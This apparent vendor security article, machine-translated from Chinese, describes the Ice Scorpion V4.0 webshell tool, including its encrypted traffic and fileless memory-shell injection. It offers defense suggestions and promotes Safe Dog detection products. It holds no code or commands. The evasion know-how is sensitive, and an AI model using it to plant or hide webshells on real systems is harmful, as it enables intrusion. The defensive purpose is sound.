当前位置：网站首页>Ice Scorpion V4.0 attack, security dog products can be fully detected

Ice Scorpion V4.0 attack, security dog products can be fully detected

2022-08-05 03:22:00 【Safe Dog News】

Disclaimer

Solemnly declare: The technology, ideas and tools involved in this account are only for learning and communication for the purpose of safety. No one may use them for illegal purposes, otherwise the consequences will be borne by themselves!

During the past two years of large-scale offensive and defensive drills, the "Ice Scorpion" caught many defensive units by surprise and miserable.But then, in response to the characteristics of Ice Scorpion, security manufacturers have also taken measures to update their own security products.When the horn of this year's actual offensive and defensive battles was officially launched, Ice Scorpion unexpectedly attacked with the "new look of 4.0", which once again made many defensive units unable to cope with it.

Faced with this threat, the Security Dog team has updated the rule base of "Webshell killing engine" on the afternoon of July 25, 2022.At the same time, SafeDog's products also have the function of "Injecting Memory Horse" for Ice Scorpion 4.0, and the "Memory Horse Killing Engine" supports detection by default.

This article will introduce the features and defense suggestions of Ice Scorpion V4.0, hoping to help defensive units during actual combat.

One

Ice Scorpion V4.0

1.The origin of the ice scorpion

The traditional webshell management tool "Chopper" has obvious attack traffic characteristics and is easy to be intercepted by detection equipment. Attackers urgently need a webshell with encrypted communication function.Due to traffic encryption, traditional WAF and IDS devices are difficult to detect.Therefore, a dynamic binary encrypted website management client "Ice Scorpion" came into being. The threats such as web page backdoor attacks and fileless attacks brought by Bing Scorpion have brought great trouble to traditional security products.

2Ice Scorpion V4.0

"Ice Scorpion" is one of the most popular WebShell management tools. The first-generation WebShell management tool "Chopper" has obvious traffic characteristics and can be easily detected.The traffic of Ice Scorpion is encrypted, which can effectively avoid the detection of traffic devices; the "Ice Scorpion" client is developed in Java, the latest version is v4.0, the management side is cross-platform, and supports ASP/ASPX/JSP/PHP and other environments.

Figure 1

In the latest V4.0, support Java Agent fileless land injection into memory horse.

Figure 2

It can be said that the revision of the Ice Scorpion made some of the measures and methods that the defenders made against the Ice Scorpion last year go to waste.

Second

Defense Suggestions for Ice Scorpion V4.0

1, Defendable points

(1) Focus on defending against file upload, file writing, and file inclusion vulnerabilities;

(2) Built-in for Ice Scorpion V4.0Analyze the traffic side of all types of webshells, and detect each type of webshells in a targeted manner;

(3) Enable monitoring of abnormal system behaviors to detect dangerous behaviors such as rebound shells and execution of high-risk system commands;

(4) Do a good job of checking the security baseline, revise the security baseline in time, and record and warn of suspicious behaviors of suspicious files to facilitate auditing.

2, Security Dog Cloud Eye can detect Ice Scorpion V4.0

The new-generation cloud host intrusion monitoring and security management platform "Cloud Eye" has functions such as "Webshell killing" and "Memory horse detection" that support the application of Ice Scorpion 4.0Attack detection.

In addition, when an attacker uses the Ice Scorpion tool to connect to a virtual terminal and execute commands, functions such as "process monitoring" can also be detected.

Host Webshell killing

Figure 3

Host memory check

Figure 4

3Security Dog Cloud Armor can detect Ice Scorpion V4.0

The adaptive container security management system "Yunjia" supports functions such as "Image Webshell Scanning", "Container Webshell Scanning", and "Container Memory Horse Detection"Detect the attack of Ice Scorpion 4.0.

In addition, when an attacker uses the Ice Scorpion tool to connect to a virtual terminal and execute commands, functions such as "process monitoring" and "behavior model" can also be detected.